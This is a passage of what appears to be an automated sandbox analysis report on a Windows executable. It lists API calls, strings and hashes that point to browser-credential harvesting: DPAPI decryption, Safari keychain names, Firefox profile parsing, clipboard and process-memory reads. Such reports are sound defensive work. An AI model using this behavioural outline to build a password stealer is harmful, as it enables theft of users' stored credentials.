                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: f87c29ce762407ddd0adaed4fac3176b7b3a7b6aeb3172bf8294812ce0be7fe2
                                • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                • Opcode Fuzzy Hash: f87c29ce762407ddd0adaed4fac3176b7b3a7b6aeb3172bf8294812ce0be7fe2
                                • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00445426
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                • String ID:
                                • API String ID: 1828521557-0
                                • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@??3@
                                • String ID:
                                • API String ID: 1936579350-0
                                • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                APIs
                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Library$AddressFreeLoadMessageProc
                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                • API String ID: 2780580303-317687271
                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                • String ID:
                                • API String ID: 4218492932-0
                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32 ref: 004182D7
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                • LocalFree.KERNEL32(?), ref: 00418342
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,0041755F,?), ref: 00417452
                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                • String ID: OsError 0x%x (%u)
                                • API String ID: 403622227-2664311388
                                • Opcode ID: d5c6fe0526594b2b514a1ddbfaf48a72c8b645ad5f50ee8d851b871b7e219225
                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                • Opcode Fuzzy Hash: d5c6fe0526594b2b514a1ddbfaf48a72c8b645ad5f50ee8d851b871b7e219225
                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                • OpenClipboard.USER32(?), ref: 00411878
                                • GetLastError.KERNEL32 ref: 0041188D
                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                  • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                  • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                • String ID:
                                • API String ID: 1203541146-0
                                • Opcode ID: 8203c75a959afec2194f5aa533a4bdb737a0ecca75d5d58e610bfa137ec1d4e9
                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                • Opcode Fuzzy Hash: 8203c75a959afec2194f5aa533a4bdb737a0ecca75d5d58e610bfa137ec1d4e9
                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Version
                                • String ID:
                                • API String ID: 1889659487-0
                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcsicmp.MSVCRT ref: 004022A6
                                • _wcsicmp.MSVCRT ref: 004022D7
                                • _wcsicmp.MSVCRT ref: 00402305
                                • _wcsicmp.MSVCRT ref: 00402333
                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                • memset.MSVCRT ref: 0040265F
                                • memcpy.MSVCRT ref: 0040269B
                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                • memcpy.MSVCRT ref: 004026FF
                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                • API String ID: 2929817778-1134094380
                                • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                • String ID: :stringdata$ftp://$http://$https://
                                • API String ID: 2787044678-1921111777
                                • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                • GetWindowRect.USER32(?,?), ref: 00414088
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                • GetDC.USER32 ref: 004140E3
                                • wcslen.MSVCRT ref: 00414123
                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                • ReleaseDC.USER32(?,?), ref: 00414181
                                • _snwprintf.MSVCRT ref: 00414244
                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                • GetClientRect.USER32(?,?), ref: 004142E1
                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                • GetClientRect.USER32(?,?), ref: 0041433B
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                • String ID: %s:$EDIT$STATIC
                                • API String ID: 2080319088-3046471546
                                • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EndDialog.USER32(?,?), ref: 00413221
                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                • memset.MSVCRT ref: 00413292
                                • memset.MSVCRT ref: 004132B4
                                • memset.MSVCRT ref: 004132CD
                                • memset.MSVCRT ref: 004132E1
                                • memset.MSVCRT ref: 004132FB
                                • memset.MSVCRT ref: 00413310
                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                • memset.MSVCRT ref: 004133C0
                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                • memcpy.MSVCRT ref: 004133FC
                                • wcscpy.MSVCRT ref: 0041341F
                                • _snwprintf.MSVCRT ref: 0041348E
                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                • SetFocus.USER32(00000000), ref: 004134B7
                                Strings
                                • {Unknown}, xrefs: 004132A6
                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                • API String ID: 4111938811-1819279800
                                • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                • EndDialog.USER32(?,?), ref: 0040135E
                                • DeleteObject.GDI32(?), ref: 0040136A
                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                • ShowWindow.USER32(00000000), ref: 00401398
                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                • ShowWindow.USER32(00000000), ref: 004013A7
                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                • String ID:
                                • API String ID: 829165378-0
                                • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00404172
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                • wcscpy.MSVCRT ref: 004041D6
                                • wcscpy.MSVCRT ref: 004041E7
                                • memset.MSVCRT ref: 00404200
                                • memset.MSVCRT ref: 00404215
                                • _snwprintf.MSVCRT ref: 0040422F
                                • wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 0040426E
                                • memset.MSVCRT ref: 004042CD
                                • memset.MSVCRT ref: 004042E2
                                • _snwprintf.MSVCRT ref: 004042FE
                                • wcscpy.MSVCRT ref: 00404311
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                • API String ID: 2454223109-1580313836
                                • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                • SetMenu.USER32(?,00000000), ref: 00411453
                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                • memcpy.MSVCRT ref: 004115C8
                                • ShowWindow.USER32(?,?), ref: 004115FE
                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
